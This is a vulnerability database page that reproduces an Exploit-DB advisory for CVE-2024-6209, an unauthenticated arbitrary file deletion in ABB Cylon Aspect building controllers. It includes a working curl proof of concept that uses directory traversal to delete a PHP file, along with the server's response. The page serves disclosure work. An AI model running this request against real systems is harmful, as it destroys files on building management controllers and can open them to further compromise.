Vulners
Lucene search
ABB Cylon Aspect 3.08.01 - Arbitrary File Delete
๐๏ธย 02 Apr 2025ย 00:00:00Reported byย LiquidWormTypeย 
ย exploitdb๐ย www.exploit-db.com๐ย 320ย Views
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | CVE-2024-6209 | 5 Jul 202414:10 | โ | circl |
 | ABB ASPECT Security Vulnerability | 5 Jul 202400:00 | โ | cnnvd |
 | CVE-2024-6209 | 5 Jul 202411:10 | โ | cve |
 | CVE-2024-6209 unauthorized file access | 5 Jul 202411:10 | โ | cvelist |
 | EUVD-2024-47987 | 5 Jul 202411:10 | โ | euvd |
 | Vulnerabilities fixed in ABB ASPECT, NEXUS Series and MATRIX Series | 6 Dec 202411:49 | โ | ncsc |
 | CVE-2024-6209 | 5 Jul 202411:15 | โ | nvd |
 | ABB Cylon Aspect 3.08.01 Arbitrary File Deletion | 24 Sep 202400:00 | โ | packetstorm |
 | PT-2024-6689 ยท Abb ยท Abb Aspectย +2 | 21 Apr 202400:00 | โ | ptsecurity |
 | CVE-2024-6209 | 5 Feb 202503:03 | โ | redhatcve |
10
# Exploit Title : ABB Cylon Aspect 3.08.01 - Arbitrary File Delete
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.01
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The BMS/BAS controller suffers from an arbitrary file deletion vulnerability.
Input passed to the 'file' parameter in 'databasefiledelete.php' is not properly
sanitised before being used to delete files. This can be exploited by an unauthenticated
attacker to delete files with the permissions of the web server using directory
traversal sequences passed within the affected POST parameter.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5827
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5827.php
CVE ID: CVE-2024-6209
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-6209
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
โโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโ
$ curl -X POST http://192.168.73.31/databaseFileDelete.php \
> -d "file0=../../../../../../../../../home/MIX_CMIX/htmlroot/validate/validateHeader.php \
> &delete0=1 \
> &total=1 \
> &submitDeleteForm=Delete"
<META HTTP-EQUIV='Refresh' content='0;URL=databaseFile.php'>Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Apr 2025 00:00Current
7.8High risk
Vulners AI Score7.8
CVSS 3.17.5 - 10
CVSS 49.4
EPSS0.42845
SSVC